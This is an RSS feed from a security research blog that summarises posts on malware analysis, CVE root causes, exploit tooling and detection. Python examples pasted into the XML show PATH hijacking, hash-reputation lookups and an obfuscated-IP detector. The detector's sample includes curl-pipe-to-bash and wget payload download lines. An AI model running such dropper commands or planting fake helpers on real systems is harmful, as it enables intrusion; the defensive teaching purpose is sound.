<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Arch Cloud Labs</title>
    <link>/</link>
    <description>Recent content on Arch Cloud Labs</description>
    <generator>Hugo</generator>
    <language>en</language>
    <lastBuildDate>Fri, 18 Oct 2024 00:00:00 +0000</lastBuildDate>
    <atom:link href="/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Running Arch Cloud Labs On $1</title>
      <link>/projects/running_acl_for_a_dollar_a_month/</link>
      <pubDate>Fri, 18 Oct 2024 00:00:00 +0000</pubDate>
      <guid>/projects/running_acl_for_a_dollar_a_month/</guid>
      <description>About The Project The best blogging platforms are frictionless and give the author control over how content is created and shared. Arch Cloud Labs&amp;rsquo; hosting has evolved over the years from a single Digital Ocean droplet to a containerized deployment with CI/CD integration at a cloud provider. This article briefly covers that journey and highlights the ease of integration and low cost of operating a modern blog on Digital Ocean&amp;rsquo;s App Platform.</description>
    </item>
    <item>
      <title>5 Years of InfoSec Focused Homelabbing</title>
      <link>/projects/5-years-of-homelab/</link>
      <pubDate>Sun, 01 Sep 2024 00:00:00 -0400</pubDate>
      <guid>/projects/5-years-of-homelab/</guid>
      <description>About the Project Five years ago, on September 22 2019, I published my first blog post titled &amp;ldquo;New Homelab&amp;rdquo;. This began a journey of documenting side projects done on nights and weekends to build skills in Reverse Engineering, Malware Analysis, and other InfoSec disciplines. While originally created to build a resume of projects for future employers, it evolved into a platform that afforded me opportunities to teach workshops at leading security conferences, land a new job, compete in an international malware analysis competition, contribute to large offensive security projects, and even have my own content referenced in other researchers&amp;rsquo; offensive security blogs and workshops.</description>
    </item>
    <item>
      <title>Deploying Hack Fortress at DEF CON 32</title>
      <link>/projects/deploying-hackfortress/</link>
      <pubDate>Sun, 18 Aug 2024 00:00:00 +0000</pubDate>
      <guid>/projects/deploying-hackfortress/</guid>
      <description>About The Project Hack Fortress (HF) is a combination of a first person shooter (Team Fortress 2) and a jeopardy-style CTF. Teams of ten are assembled with six gamers and four hackers in a single-elimination bracket. Hackers solve challenges and unlock points to buy in-game items for gamers. Each round is thirty minutes long, except for the finals, which run for forty-five minutes. I&amp;rsquo;ve previously blogged about Hack Fortress challenges (1, 2), but this post covers how each round of challenges has been deployed for the last seven-ish years at DEF CON and ShmooCon.</description>
    </item>
    <item>
      <title>Reverse Engineering Unknown Binary Files - Dwarf Fortress Save Files</title>
      <link>/projects/dwarffortress/</link>
      <pubDate>Sun, 07 Jul 2024 00:00:00 -0400</pubDate>
      <guid>/projects/dwarffortress/</guid>
      <description>About The Project The video game hacking community is often a source of inspiration for those in the information security field. From in-depth memory hooking techniques that circumvent anti-cheat to beating the final boss via Cheat Engine scripts, there&amp;rsquo;s always something to learn that parallels the challenges faced by those in the offensive or defensive fields. The techniques discussed in this blog are analogous to the methodology used in malware analysis when dealing with custom packers.</description>
    </item>
    <item>
      <title>PollyPDF: Generating Audiobooks from Academic Abstracts</title>
      <link>/projects/polly2pdf/</link>
      <pubDate>Sat, 18 May 2024 00:00:00 -0400</pubDate>
      <guid>/projects/polly2pdf/</guid>
      <description>About The Project Trying to stay up to date with the latest security research is challenging. There are countless security blog posts and interesting academic papers to keep up with, and realistically you don&amp;rsquo;t have time to sit down and read everything that looks interesting. Wouldn&amp;rsquo;t it be great to have your own personal &amp;ldquo;Audible&amp;rdquo;-esque service to listen to articles while doing chores around the house? This blog post is about integrating AWS&amp;rsquo; text-to-speech service, &amp;ldquo;Polly&amp;rdquo;, to generate audio clips of academic paper abstracts.</description>
    </item>
    <item>
      <title>Badge Hacking - DEFCON - Embedded Systems Village Badge 2023</title>
      <link>/projects/defcon-esv-2023/</link>
      <pubDate>Wed, 10 Apr 2024 00:00:00 +0000</pubDate>
      <guid>/projects/defcon-esv-2023/</guid>
      <description>This past year at DEF CON, the Embedded Systems Village (ESV) sold a custom badge that, at the time, I thought was a CTF challenge. Fast forward months later, when I’ve actually sat down to look at the badge: it turns out the badge is centered around an &amp;ldquo;FTDI chip&amp;rdquo; which enables communication over multiple embedded protocols. The badge actually enabled CTF contestants at DEF CON to poke at embedded systems, and is a pretty useful device for the casual hardware hacker.</description>
    </item>
    <item>
      <title>HackFortressOS - Adventures with Buildroot</title>
      <link>/projects/hackfortressos/</link>
      <pubDate>Sun, 14 Jan 2024 00:00:00 -0400</pubDate>
      <guid>/projects/hackfortressos/</guid>
      <description>About The Project Arch Cloud Labs’ last three blog posts dove into different aspects of IoT/embedded vulnerabilities. Coming off of these bug hunting adventures, I wanted to build a unique set of Capture The Flag (CTF) challenges for this year&amp;rsquo;s Hack Fortress. To do this, I referenced OWASP’s IoT Top 10 and used Buildroot to build a custom operating system for a Raspberry Pi 1, dubbed “HackFortress OS”.</description>
    </item>
    <item>
      <title>Hardware Hacking - Dumping Flash Memory of a TrendNet-731BRv1 Router</title>
      <link>/projects/trendnet-731br-spi-flash-dump/</link>
      <pubDate>Sun, 19 Nov 2023 00:00:00 +0000</pubDate>
      <guid>/projects/trendnet-731br-spi-flash-dump/</guid>
      <description>About The Project Continuing Arch Cloud Labs&amp;rsquo; hardware and router reverse engineering journey, I wanted to dump the firmware of my TrendNet-731BRv1 by reading the flash memory on the PCB rather than downloading the firmware from TrendNet&amp;rsquo;s website. Consider a scenario where the firmware is no longer hosted publicly by TrendNet (after all, it is a discontinued product): being able to dump firmware off of a device is useful not only for deprecated hardware but also for poking at weird devices you might find at a garage sale or in DEF CON&amp;rsquo;s IoT/Embedded Village.</description>
    </item>
    <item>
      <title>Hardware Hacking - Root UART Shells on GL-AR750</title>
      <link>/projects/uart-shells/</link>
      <pubDate>Sun, 05 Nov 2023 00:00:00 +0000</pubDate>
      <guid>/projects/uart-shells/</guid>
      <description>About The Project Continuing from Arch Cloud Labs&amp;rsquo; TrendNet 731BR router hacking blog post, which tore apart the firmware, we&amp;rsquo;ll now start poking at router hardware! The primary objective is to grow my skills in the embedded security domain for DEF CON&amp;rsquo;s IoT and Embedded Security Villages next year. This weekend&amp;rsquo;s project focused on a GL-AR750. I originally bought this router in 2017 as a travel router, and it has been collecting dust in my closet for quite some time.</description>
    </item>
    <item>
      <title>Old CVEs Leading to New Vulns - Reverse Engineering TrendNet-731BRv1</title>
      <link>/projects/trendnet-731br/</link>
      <pubDate>Sun, 29 Oct 2023 00:00:00 +0000</pubDate>
      <guid>/projects/trendnet-731br/</guid>
      <description>About The Project I recently bought a discontinued TrendNet router to become more proficient at reverse engineering embedded systems. Each year at DEF CON, the IoT Village and Embedded Village have CTFs and hands-on workshops, and I’m hoping to get my skills up to par to take a crack at one of them next year.&#xA;TrendNet home router model “TEW-731BRv2” has a known vulnerability, identified by CVE-2015-1187, that leads to remote code execution.</description>
    </item>
    <item>
      <title>Abusing gdb Features for Data Ingress &amp; Egress</title>
      <link>/projects/debuginfod/</link>
      <pubDate>Sun, 22 Oct 2023 00:00:00 +0000</pubDate>
      <guid>/projects/debuginfod/</guid>
      <description>About The Project Modern software development environments have significant debugging capabilities for troubleshooting issues that arise from the complex nature of modern software. These capabilities typically manifest in an Integrated Development Environment (IDE) as features that extend the IDE&amp;rsquo;s ability to examine the state of an application at run time or analyze previous binary executions. The standalone GNU Debugger (gdb) is integrated into a wide variety of IDEs and other third-party utilities (1, 2, 3) to provide a robust debugging interface for end users.</description>
    </item>
    <item>
      <title>Analyzing &amp; Patching a DLL Reverse Shell</title>
      <link>/projects/dll-rev-shell/</link>
      <pubDate>Sun, 01 Oct 2023 00:00:00 -0400</pubDate>
      <guid>/projects/dll-rev-shell/</guid>
      <description>About The Project On September 18th, the Twitter account Malware Hunter Team tweeted about a DLL, batch script, and PowerShell script being publicly hosted at 103[.]68[.]109[.]31. Given that a DLL was being hosted, I thought it would be an interesting target to reverse engineer. This blog post analyzes that DLL and ultimately patches this simple reverse shell to call back to a local virtual machine.&#xA;OSINT Initial triage with VirusTotal reports that some vendors flag the target IP address as malicious, with numerous communicating files also flagged as malicious.</description>
    </item>
    <item>
      <title>Pwntools 103 - Automating Binary Interaction</title>
      <link>/projects/pwntools-automating-interactions/</link>
      <pubDate>Thu, 28 Sep 2023 00:00:00 +0000</pubDate>
      <guid>/projects/pwntools-automating-interactions/</guid>
      <description>About The Project In continuation of Arch Cloud Labs&amp;rsquo; previous blog post on Pwntools, we dive deeper into the framework, focusing on automating interactions with binary programs. Imagine a scenario where the binary must be walked down a specific path before your final payload is delivered. Simply piping shellcode into the binary won&amp;rsquo;t suffice. This is where Pwntools&amp;rsquo; &amp;ldquo;io&amp;rdquo; methods come to the rescue, simplifying the automation of both local and remote exploits across a variety of protocols.</description>
    </item>
    <item>
      <title>Pwntools 102 - Crafting Shellcode with Shellcraft</title>
      <link>/projects/pwntools-shellcraft/</link>
      <pubDate>Mon, 18 Sep 2023 00:00:00 +0000</pubDate>
      <guid>/projects/pwntools-shellcraft/</guid>
      <description>About The Project Following up on Arch Cloud Labs&amp;rsquo; previous blog post on Pwntools, we&amp;rsquo;ll continue exploring the framework, this time focusing on shellcode generation. It&amp;rsquo;s not uncommon for pwn/reverse engineering challenges to require executing shellcode. The end goal may be to obtain access to a remote system, or simply to display the contents of a file. Instead of searching for shellcode on exploit-db or Packet Storm, pwntools provides an easy-to-use interface to generate it.</description>
    </item>
    <item>
      <title>Pwntools 101 - Pwndbg &amp; Buffer Overflows</title>
      <link>/projects/pwntools-bof/</link>
      <pubDate>Thu, 07 Sep 2023 00:00:00 +0000</pubDate>
      <guid>/projects/pwntools-bof/</guid>
      <description>About The Project Pwntools, and the gdb plugin Pwndbg, are Python frameworks for automating different parts of exploit development. They are highly popular amongst CTF players because they simplify and accelerate the creation of Proof of Concept (PoC) scripts for memory corruption exploits. I&amp;rsquo;m not proficient in using pwntools and pwndbg, but this marks the beginning of a series of blogs aimed at improving my skills with pwntools for memory corruption CTF challenges.</description>
    </item>
    <item>
      <title>Debugging with gdb - Fixing a NULL Pointer Dereference in dhcpcd</title>
      <link>/projects/gdb-debugging-1/</link>
      <pubDate>Thu, 06 Jul 2023 00:00:00 +0000</pubDate>
      <guid>/projects/gdb-debugging-1/</guid>
      <description>About the Project Several tutorials exist on how to leverage the GNU Debugger (GDB) to debug misbehaving applications. However, a majority of these blogs just show commands to run that poke at memory addresses, and don&amp;rsquo;t show the process of resolving said bug. This blog post will walk through how I recently identified, tried to fix, and ultimately reported a bug in dhcpcd 10.0.1 via gdb.&#xA;Identifying The Issue The command line utility coredumpctl is used to interact with the coredumps saved by the systemd-coredump service.</description>
    </item>
    <item>
      <title>Circumventing inotify Watchdogs</title>
      <link>/projects/inotify/</link>
      <pubDate>Sun, 11 Jun 2023 00:00:00 +0000</pubDate>
      <guid>/projects/inotify/</guid>
      <description>About The Project Recently I&amp;rsquo;ve been building rudimentary file monitoring tools to get better at Golang, and build faux-watchdog programs for research at Arch Cloud Labs. Through this experimentation, I&amp;rsquo;ve identified some interesting gaps in the inotify subsystem that are new to me, but are well documented in the Linux man pages. This blog post will explore how to circumvent read detections implemented by inotify.&#xA;Inotify As a Monitoring Solution Per the Linux man page, the inotify subsystem:</description>
    </item>
    <item>
      <title>Responding to a LogMeIn Phishing Scam</title>
      <link>/projects/uncovering_a_phishing_scam/</link>
      <pubDate>Sat, 25 Mar 2023 00:00:00 -0400</pubDate>
      <guid>/projects/uncovering_a_phishing_scam/</guid>
      <description>About The Project Recently a close friend fell victim to a scam that resulted in giving a scammer access to their laptop via LogMeIn. This type of scam is in line with the &amp;ldquo;refund scams&amp;rdquo; that YouTubers make videos about, spending hours on the phone with the scammers to waste their time. This blog post discusses the steps Arch Cloud Labs took after the scammer had access, the artifacts recovered, and ultimately an examination of the phishing infrastructure.</description>
    </item>
    <item>
      <title>Analyzing CVE-2022-4883 (PATH Hijacking in libxpm)</title>
      <link>/projects/cve-2022-4883/</link>
      <pubDate>Sun, 19 Mar 2023 00:00:00 +0000</pubDate>
      <guid>/projects/cve-2022-4883/</guid>
      <description>About The Project CVE-2022-4883 outlines a Linux PATH hijacking vulnerability in the libxpm package. Libxpm is used in a variety of projects to parse &amp;ldquo;X Pixmap&amp;rdquo; images. The National Vulnerability Database rates this vulnerability at a CVSS score of 8.8 and Red Hat has given it a CVSS score of 8.1. Per the Arch Linux package page, 39 packages currently list libxpm as a dependency. This blog post walks through the vulnerability and its exploitation.</description>
    </item>
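The PATH-hijacking class that CVE-2022-4883 belongs to, reduced to a runnable illustration. This is an added example, not code from the Arch Cloud Labs post or from libXpm: a library that launches a helper by bare name (for libXpm, an external decompressor) lets whoever controls PATH choose the binary that runs, while resolving the helper only from fixed trusted directories does not. The planted helper lives in a temporary directory created by the script, and the trusted directory list is an assumption about where a distribution installs such helpers.

```python
"""
Added example (not from the original post): the PATH-hijacking pattern behind
CVE-2022-4883 in miniature.  Code that launches a helper by bare name lets
whoever controls PATH pick the binary that runs; resolving helpers only from
fixed trusted directories does not.  The planted helper is built in a
temporary directory here; TRUSTED_DIRS is an assumption about the distro.
"""
import os
import shutil
import stat
import tempfile

TRUSTED_DIRS = ("/usr/bin", "/bin")  # assumed distro helper locations


def resolve_like_execlp(name, path_env):
    """What execlp()/execvp() do: walk PATH left to right and run the first
    executable file whose name matches.  Whoever controls PATH wins."""
    return shutil.which(name, path=path_env)


def resolve_trusted(name, trusted_dirs=TRUSTED_DIRS):
    """Hardened form: ignore PATH and accept the helper only from
    trusted_dirs, so a user-writable directory can never supply it."""
    for directory in trusted_dirs:
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def plant_fake_helper(directory, name="gzip"):
    """Stand-in for the attacker's step: drop an executable named like the
    helper into a directory the attacker can put at the front of PATH."""
    path = os.path.join(directory, name)
    with open(path, "w") as handle:
        handle.write("#!/bin/sh\necho hijacked\n")
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)
    return path


def demo(helper="gzip"):
    """Return (hijacked, trusted_ok): whether PATH-based resolution picked the
    planted file, and whether trusted resolution stayed inside TRUSTED_DIRS."""
    with tempfile.TemporaryDirectory() as attacker_dir:
        fake = plant_fake_helper(attacker_dir, helper)
        attacker_path = os.pathsep.join((attacker_dir,) + TRUSTED_DIRS)
        hijacked = resolve_like_execlp(helper, attacker_path) == fake
        trusted = resolve_trusted(helper)
        trusted_ok = trusted is None or os.path.dirname(trusted) in TRUSTED_DIRS
        return hijacked, trusted_ok


if __name__ == "__main__":
    print("PATH resolution hijacked: %s, trusted resolution safe: %s" % demo())
```

The same check applies to any code that shells out: grep for execlp, execvp, popen and system calls whose first argument has no slash, and for PATH being inherited from an untrusted caller.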
    <item>
      <title>Disabling ClamAV as an Unprivileged User</title>
      <link>/projects/disabling-clamav-as-unprivileged-user/</link>
      <pubDate>Sun, 19 Feb 2023 00:00:00 +0000</pubDate>
      <guid>/projects/disabling-clamav-as-unprivileged-user/</guid>
      <description>About The Project ClamAV is an Open Source antivirus engine that is widely used on mail servers to scan incoming messages. On February 15, 2023 ClamAV published a security advisory detailing a potential remote code execution vulnerability in its HFS+ file parser. This vulnerability was given the CVE identifier CVE-2023-20032. While reading about this vulnerability, I stumbled across an open pull request indicating that it&amp;rsquo;s possible for non-privileged users to disable ClamAV.</description>
    </item>
    <item>
      <title>Analyzing Shellcode with GPT</title>
      <link>/projects/shellcode_gpt/</link>
      <pubDate>Mon, 13 Feb 2023 00:00:00 +0000</pubDate>
      <guid>/projects/shellcode_gpt/</guid>
      <description>About The Project GPT-3 has taken the InfoSec world by storm, and there are a million tweets, posts, articles, etc&amp;hellip; with interesting use cases. Most of the use cases I&amp;rsquo;ve seen are focused on offensive/red team tooling. A notable exception is IDA Pro/Ghidra plugins that annotate assembly code blocks with plain English (or close to it) explanations of what&amp;rsquo;s going on. Arch Cloud Labs has previously posted on how to generate shellcode with radare2 as well as how to extract shellcode with Ghidra.</description>
    </item>
    <item>
      <title>Analyzing CVE-2022-46330 (DLL Hijacking in Squirrel.Windows)</title>
      <link>/projects/cve-2022-46330/</link>
      <pubDate>Sun, 08 Jan 2023 00:00:00 +0000</pubDate>
      <guid>/projects/cve-2022-46330/</guid>
      <description>About The Project In December of 2022, a DLL Hijacking vulnerability with a CVSS score of 7.8 was reported in the Squirrel.Windows auto-install/update utility. This blog post walks through the vulnerability and analyzes its root cause with procmon.&#xA;Analyzing the Security Advisory Squirrel.Windows is an installation utility for Windows desktop applications that does not require a traditional Windows wizard installation. CVE-2022-46330 states that,&#xA;Squirrel.Windows is both a toolset and a library that provides installation and update functionality for Windows desktop applications.</description>
    </item>
    <item>
      <title>Abstractions &amp; The Art of Debugging</title>
      <link>/projects/know_your_tools/</link>
      <pubDate>Thu, 05 Jan 2023 00:00:00 +0000</pubDate>
      <guid>/projects/know_your_tools/</guid>
      <description>Know Your Tools, and Fear No Bug One of my favorite series of blog posts of all time is &amp;ldquo;Unix as an IDE&amp;rdquo;. These posts walk you through how your Unix/Linux environment is your IDE. This philosophy challenges the use of a dedicated IDE for development, as all the tools you need are already on your operating system. Debugger integration? Why not just use gdb rather than the wrapper your IDE provides?</description>
    </item>
    <item>
      <title>Analyzing CVE-2022-23093 (FreeBSD Ping Buffer Overflow)</title>
      <link>/projects/cve-2022-23093/</link>
      <pubDate>Wed, 21 Dec 2022 00:00:00 +0000</pubDate>
      <guid>/projects/cve-2022-23093/</guid>
      <description>About The Project In November of 2022 the FreeBSD project announced CVE-2022-23093, a buffer overflow vulnerability in the ping utility. This blog post analyzes the vulnerability and documents the steps to set up an environment for analyzing the root cause of the issue with gdb. Illuminating the Security Advisory The FreeBSD advisory gave the following description of the vulnerability:&#xA;ping reads raw IP packets from the network to process responses in the pr_pack() function.</description>
    </item>
    <item>
      <title>Detecting off The Land - Hash Lookups from Native Tooling</title>
      <link>/projects/detecting-off-the-land/</link>
      <pubDate>Sat, 17 Dec 2022 00:00:00 +0000</pubDate>
      <guid>/projects/detecting-off-the-land/</guid>
      <description>About The Project Several Red Team projects exist to &amp;ldquo;live off the land&amp;rdquo; and avoid introducing additional executables into an environment. This gives Red Teamers and adversaries the advantage of not risking something in their toolkit getting caught by the latest and greatest EDR. But what about the Blue Teamers? The DFIR engineers out there working tirelessly to ensure the safety of an organization? This blog post highlights how to integrate Team Cymru&amp;rsquo;s Malware Hash Registry into your workflow for quickly identifying whether or not something in your environment requires more investigation.</description>
    </item>
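The lookup the post builds on, as an added example that is not code from the Arch Cloud Labs post or from Team Cymru: hash the file, form the query name under the Malware Hash Registry zone, assemble the native dig command that asks for it, and parse the TXT answer (a Unix timestamp of the last sighting and a detection percentage; an unknown hash gets NXDOMAIN). The file bytes and the TXT reply below are constructed samples, the triage threshold is an assumed local policy, and nothing here touches the network.

```python
"""
Added example (not from the original post): build the DNS query name that
Team Cymru's Malware Hash Registry (MHR) answers, and parse its TXT reply.
The dig invocation is only assembled as an argv list, and the TXT reply used
below is a constructed sample; nothing here touches the network.
"""
import hashlib
from datetime import datetime, timezone

MHR_ZONE = "malware.hash.cymru.com"

# Constructed inputs: harmless bytes standing in for a suspicious file, and a
# TXT answer in the documented "UNIX_TS DETECTION_PCT" shape.
SAMPLE_FILE = b"constructed sample bytes, not malware"
SAMPLE_ANSWER = '"1221154281 53"'


def mhr_query_name(data, algo="sha1"):
    """Hash the file contents and return the MHR query name.  The registry
    documents MD5 and SHA-1 as its keys."""
    if algo not in ("md5", "sha1"):
        raise ValueError("MHR is keyed by md5 or sha1")
    digest = hashlib.new(algo, data).hexdigest()
    return "%s.%s" % (digest, MHR_ZONE)


def dig_argv(query_name):
    """The native-tool lookup the post is about: dig +short NAME TXT."""
    return ["dig", "+short", query_name, "TXT"]


def parse_mhr_txt(answer):
    """Parse dig's +short output.  An unknown hash yields NXDOMAIN (dig prints
    nothing with +short); a known one yields '"UNIX_TS DETECTION_PCT"'.
    Returns None for unknown, else last_seen (UTC) and detection_pct."""
    text = answer.strip().strip('"')
    if not text or text.startswith("NXDOMAIN"):
        return None
    fields = text.split()
    if len(fields) != 2:
        raise ValueError("unexpected MHR answer: %r" % answer)
    ts, pct = int(fields[0]), int(fields[1])
    return {
        "last_seen": datetime.fromtimestamp(ts, tz=timezone.utc),
        "detection_pct": pct,
    }


def triage(answer, threshold_pct=50):
    """Map an MHR answer to a triage label.  threshold_pct is an assumed
    local policy, not something MHR defines."""
    hit = parse_mhr_txt(answer)
    if hit is None:
        return "unknown-to-MHR"
    if hit["detection_pct"] >= threshold_pct:
        return "known-malicious"
    return "needs-investigation"


if __name__ == "__main__":
    name = mhr_query_name(SAMPLE_FILE, "md5")
    print(" ".join(dig_argv(name)))
    print(triage(SAMPLE_ANSWER), parse_mhr_txt(SAMPLE_ANSWER))
```

On a Windows host the same query goes through nslookup -q=txt NAME; the answer format is identical, so parse_mhr_txt applies unchanged once the surrounding nslookup output is trimmed.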
    <item>
      <title>Analysis of a LoadLibraryA Stack String Obfuscation Technique with Radare2 &amp; x86dbg</title>
      <link>/projects/loadlibrary-analysis/</link>
      <pubDate>Sun, 13 Nov 2022 12:33:36 -0400</pubDate>
      <guid>/projects/loadlibrary-analysis/</guid>
      <description>About the Project Today, we&amp;rsquo;re going to analyze a malicious binary recently identified by Arch Cloud Labs&amp;rsquo; malware collection system &amp;ldquo;Archie&amp;rdquo;. This binary leverages the LoadLibraryA function to resolve DLLs at run time for additional functionality. Malware samples typically do this to keep the import table sparse, in an attempt to avoid triggering static rule detections or to evade EDR products. This particular sample struck me as interesting because of the stack string obfuscation method used, which Ghidra did not disassemble correctly.</description>
    </item>
    <item>
      <title>Cryptojacking Campaign Adopts Platypus for C2</title>
      <link>/projects/cryptojacking-adopts-termite-c2-utility/</link>
      <pubDate>Sun, 23 Oct 2022 00:00:00 +0000</pubDate>
      <guid>/projects/cryptojacking-adopts-termite-c2-utility/</guid>
      <description>About The Project Last week I looked at a Cryptojacking campaign that leveraged a curl trick in the bash dropper to resolve IPv4 addresses from large integer values. Revisiting the bash dropper, I discovered the threat actor has updated the script to download and execute a command-and-control payload called &amp;ldquo;Termite&amp;rdquo; from the Platypus GitHub project. This blog walks through the analysis of the Termite agent, and how to statically identify the upstream IPv4 address in use.</description>
    </item>
    <item>
      <title>Bash Dropper Tricks with Curl</title>
      <link>/projects/bash_dropper_tricks/</link>
      <pubDate>Sat, 15 Oct 2022 00:00:00 -0400</pubDate>
      <guid>/projects/bash_dropper_tricks/</guid>
      <description>About The Project Today we&amp;rsquo;re going to look at a couple of neat curl tricks I found in a recent bash dropper I was analyzing that resulted in surprisingly low VirusTotal detections! As previously blogged about (1, 2, 3), Arch Cloud Labs runs a handful of honeypots to collect attacker data to hone my skills in DFIR topics. While this was just another Cryptominer targeting an exposed docker socket, the initial dropper script used a neat trick with curl that I think was worth a quick write-up.</description>
    </item>
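The host forms behind the curl trick above, as an added example that is not code from the Arch Cloud Labs post: curl, like any parser with inet_aton() semantics, accepts an IPv4 host written as a single decimal integer, as hex, as octal components, or in the short forms a.b and a.b.c where the last component fills the remaining bytes. normalize_legacy_ipv4() folds all of those back to dotted-quad, and find_obfuscated_hosts() flags URLs in a script that use any form other than plain decimal dotted-quad. The dropper lines it scans are constructed, not taken from the sample the post analysed.

```python
"""
Added example (not from the original post): the host forms that curl, and any
inet_aton()-style parser, accept as an IPv4 address.  normalize_legacy_ipv4()
turns a decimal, octal, hex or short-form host back into dotted-quad, and
find_obfuscated_hosts() flags URLs in a script that use them.  The dropper
lines below are constructed, not taken from the sample the post analysed.
"""
import re

URL_HOST_RE = re.compile(r"(?:https?|ftp)://([^/\s:'\"]+)")
# Plain decimal dotted-quad with no leading zeros: the one form that is not suspicious.
PLAIN_DOTTED_QUAD_RE = re.compile(r"^(?:(?:0|[1-9]\d{0,2})\.){3}(?:0|[1-9]\d{0,2})$")
PART_RE = re.compile(r"^(?:0[xX][0-9a-fA-F]+|[0-9]+)$")


def _parse_part(part):
    """One inet_aton() component: 0x.. is hex, a leading 0 means octal,
    anything else decimal.  Rejects signs, spaces and underscores that
    Python's int() would otherwise tolerate."""
    if not PART_RE.match(part):
        raise ValueError(part)
    if part[:2].lower() == "0x":
        return int(part, 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part)


def normalize_legacy_ipv4(host):
    """Return host as dotted-quad if inet_aton() would accept it, else None.
    Forms a, a.b, a.b.c and a.b.c.d are allowed; the last component fills
    every remaining byte, so 3232235777 and 192.168.257 both mean 192.168.1.1."""
    parts = host.split(".")
    if len(parts) > 4:
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    for v in values[:-1]:
        if v > 255:
            return None
    remaining = 5 - len(parts)  # bytes covered by the last component
    if values[-1] > 256 ** remaining - 1:
        return None
    total = 0
    for v in values[:-1]:
        total = total * 256 + v
    total = total * 256 ** remaining + values[-1]
    return ".".join(str((total >> shift) % 256) for shift in (24, 16, 8, 0))


def find_obfuscated_hosts(script_text):
    """Return [(raw_host, dotted_quad)] for every URL host in script_text that
    is an IPv4 address written in anything other than plain decimal
    dotted-quad.  Hostnames and ordinary addresses are left alone."""
    hits = []
    for raw in URL_HOST_RE.findall(script_text):
        if PLAIN_DOTTED_QUAD_RE.match(raw):
            continue
        dotted = normalize_legacy_ipv4(raw)
        if dotted is not None:
            hits.append((raw, dotted))
    return hits


# Constructed sample in the shape of the dropper the post describes.
SAMPLE_DROPPER = """#!/bin/bash
curl -fsSL http://3232235777/x.sh | bash
wget -q -O /tmp/.m http://0xC0A80101:8080/m
curl http://0300.0250.01.01/c || curl http://192.168.1.1/c
curl -s https://updates.example.com/pkg
"""

if __name__ == "__main__":
    for raw, dotted in find_obfuscated_hosts(SAMPLE_DROPPER):
        print("%-20s resolves to %s" % (raw, dotted))
```

The normalised address is what belongs in a blocklist or a pivot query; the raw form is what a string-match rule on the dotted-quad would have missed, which is one reason the dropper scored so few detections.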
    <item>
      <title>Detection Engineering with FLAWS &amp; Falco</title>
      <link>/projects/detection_engineering_with_falco/</link>
      <pubDate>Tue, 20 Sep 2022 00:00:00 +0000</pubDate>
      <guid>/projects/detection_engineering_with_falco/</guid>
      <description>About The Project I&amp;rsquo;m currently studying for my Certified Kubernetes Security Specialist (CKS) certification. As part of this certification, training courses recommend looking into the runtime security provided by Falco. Falco is a Cloud Native Computing Foundation project created by Sysdig that provides alerting on cloud, container and Kubernetes logs. While training courses such as &amp;ldquo;A Cloud Guru&amp;rdquo; do a good job of covering container and host based log ingestion with Falco, I wanted to experiment with CloudTrail data as well.</description>
    </item>
    <item>
      <title>Bulk Analysis of Cobalt Strike&#39;s Beacon Configurations</title>
      <link>/projects/bulk-cs-analysis/</link>
      <pubDate>Fri, 01 Jul 2022 14:22:22 +0000</pubDate>
      <guid>/projects/bulk-cs-analysis/</guid>
      <description>About The Project Security researcher Silas Cutler recently tweeted a link to a unique data set of Cobalt Strike Beacon payloads, and their extracted configurations (thanks Silas!). This is a fairly large data set going back to November of 2021, and containing over 100k entries (112,900 to be exact, but I had trouble parsing about 900 of them). This blog post will take a quick look at a subset of the data (112,066 total records) provided by said dataset within Elasticsearch.</description>
    </item>
    <item>
      <title>Working Towards SLSA-1 for AUR Builds</title>
      <link>/projects/slsa-1/</link>
      <pubDate>Sun, 10 Apr 2022 00:00:00 +0000</pubDate>
      <guid>/projects/slsa-1/</guid>
      <description>About The Project Recently I&amp;rsquo;ve started supporting a package in the Arch User Repository (AUR) in order to contribute to the Arch Linux project. In an effort to &amp;ldquo;automate all the things!&amp;rdquo;, I have regular Jenkins builds cloning and building the upstream GitHub project. This blog post outlines how I&amp;rsquo;ve tried to align with the Supply-chain Levels for Software Artifacts (SLSA) framework as an exercise in securing build supply chains for community contributions.</description>
    </item>
    <item>
      <title>Scaling Dumb Fuzzing with Kubernetes</title>
      <link>/projects/dumb_fuzzing/</link>
      <pubDate>Mon, 21 Feb 2022 00:00:00 +0000</pubDate>
      <guid>/projects/dumb_fuzzing/</guid>
      <description>About The Project The e-zine tmp.out focuses on ELF/Linux related research in the style of Phrack. After reading an article on fuzzing radare2 for 0days in 30 lines of code, I thought it would be a fun weekend project to extend this research and port their code to a container deployed in a Kubernetes cluster. To take it one step further, building fresh releases of the radare2 project&amp;rsquo;s master branch and integrating them into a CI/CD pipeline that deploys container builds to a Kubernetes cluster seemed like an excellent way to really go overboard and eat up my entire weekend.</description>
    </item>
    <item>
      <title>Exploring Binary Loaders Pt-1</title>
      <link>/projects/binary_loaders_1/</link>
      <pubDate>Sun, 13 Feb 2022 00:00:00 -0400</pubDate>
      <guid>/projects/binary_loaders_1/</guid>
      <description>About The Project Lately I&amp;rsquo;ve been playing around more with binary exploitation CTF challenges. This blog post covers recent experimentation with ELF binary loaders, and extending them to fetch a remote resource, load it into memory, and finally execute it. There are several GitHub repos with purpose-built binary loaders for ELFs/PEs/Mach-Os/etc&amp;hellip; so it was easy to focus on experimentation and debugging rather than &amp;ldquo;why won&amp;rsquo;t my code compile?</description>
    </item>
    <item>
      <title>Discord Notifications for AWS Billing</title>
      <link>/projects/discord-notifications-for-aws-billing/</link>
      <pubDate>Wed, 26 Jan 2022 20:00:36 -0400</pubDate>
      <guid>/projects/discord-notifications-for-aws-billing/</guid>
      <description>About the Project Lately, I&amp;rsquo;ve seen some horror stories (1, 2) about side projects gone awry resulting in HUGE cloud bills. As a homelab enthusiast and cloud user, I wanted to write up some notes on how I stay on top of billing to avoid surprise costs. This blog outlines an alerting pipeline I&amp;rsquo;ve built in my homelab.&#xA;Building Notification Pipelines AWS Billing allows for e-mail notifications in the event you&amp;rsquo;re approaching a particular self-defined billing threshold.</description>
    </item>
    <item>
      <title>Shellcode Generation with The Radare2 Framework</title>
      <link>/projects/r2_shellcode_generation/</link>
      <pubDate>Sun, 19 Dec 2021 00:00:00 +0000</pubDate>
